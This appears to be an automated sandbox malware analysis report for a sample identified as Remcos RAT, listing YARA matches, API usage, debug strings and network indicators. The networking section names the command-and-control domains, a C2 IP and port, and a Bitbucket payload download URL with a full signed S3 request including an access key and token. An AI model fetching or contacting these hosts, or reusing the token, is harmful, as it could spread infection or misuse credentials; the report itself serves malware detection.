Source: Yara match | File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
Source: Submitted sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0295293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_0295293A
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0297293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,19_2_0297293A
Source: jW3NEKvxH1.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

Source: Yara match | File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

              Privilege Escalation

              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02926764 _wcslen,CoGetObject,6_2_02926764
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02946764 _wcslen,CoGetObject,19_2_02946764
              Source: jW3NEKvxH1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.30.3:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2245097882.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000000.2272956424.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000A.00000000.2294839083.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
              Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
              Source: Binary string: easinvoker.pdbH source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B2D000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B5E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.000000000282C000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.000000000282E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
              Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D35908
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0292B335
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0293B42F
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296D5E9 FindFirstFileExA,6_2_0296D5E9
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0292B53A
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02927A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_02927A8C
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926AC2 FindFirstFileW,FindNextFileW,6_2_02926AC2
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029289A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_029289A9
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02938C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_02938C69
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02928DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_02928DA7
              Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,9_2_00E40207
              Source: C:\Users\Public\alpha.pif Code function: 9_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,9_2_00E4589A
              Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00E44EC1
              Source: C:\Users\Public\alpha.pif Code function: 9_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose,9_2_00E53E66
              Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,9_2_00E3532E
              Source: C:\Users\Public\alpha.pif Code function: 11_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,11_2_00E4589A
              Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,11_2_00E40207
              Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00E44EC1
              Source: C:\Users\Public\alpha.pif Code function: 11_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose,11_2_00E53E66
              Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,11_2_00E3532E
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0294B335
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,19_2_0295B42F
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0298D5E9 FindFirstFileExA,19_2_0298D5E9
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0294B53A
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02947A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,19_2_02947A8C
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02946AC2 FindFirstFileW,FindNextFileW,19_2_02946AC2
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029489A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,19_2_029489A9
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02958C69 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_02958C69
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02948DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,19_2_02948DA7
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_02926F06

              Networking

              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49730 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49785 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49856 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49914 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49967 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50018 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50031 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50032 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50030 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50028 -> 104.243.42.254:5874
              Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50033 -> 104.243.42.254:5874
              Source: Malware configuration extractor URLs: https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke
              Source: Malware configuration extractor URLs: zara.master-workdone.com.ua
              Source: Malware configuration extractor URLs: manazara.master-workdone.com.ua
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4E4B8 InternetCheckConnectionA,0_2_02D4E4B8
              Source: global traffic TCP traffic: 192.168.2.6:49730 -> 104.243.42.254:5874
              Source: Joe Sandbox View IP Address: 185.166.143.50 185.166.143.50
              Source: Joe Sandbox View ASN Name: RELIABLESITEUS RELIABLESITEUS
              Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 3.5.30.3:443
              Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 185.166.143.50:443
              Source: global traffic HTTP traffic detected: GET /masterservicwes/mastermanservices/downloads/165_Dlaybpxloke HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: bitbucket.org
              Source: global traffic HTTP traffic detected: GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F6dfGCGZytk7EGcfIrQ5l%2F7x%2BltpFGD%2F65w%2BoCYBUwnHQOgiJLucLeN8XglIkhzkhQFYiFvroeURjDmWQBwBq5NvFGgQ%3D%3D&Expires=1733480491 HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: bbuseruploads.s3.amazonaws.com
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029460F7 recv,6_2_029460F7
              Source: global traffic DNS traffic detected: DNS query: bitbucket.org
              Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: global traffic DNS traffic detected: DNS query: zara.master-workdone.com.ua
              Source: global traffic DNS traffic detected: DNS query: manazara.master-workdone.com.ua
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: SndVol.exe String found in binary or memory: http://geoplugin.net/json.gp
              Source: jW3NEKvxH1.exe, 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, SndVol.exe, 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
              Source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
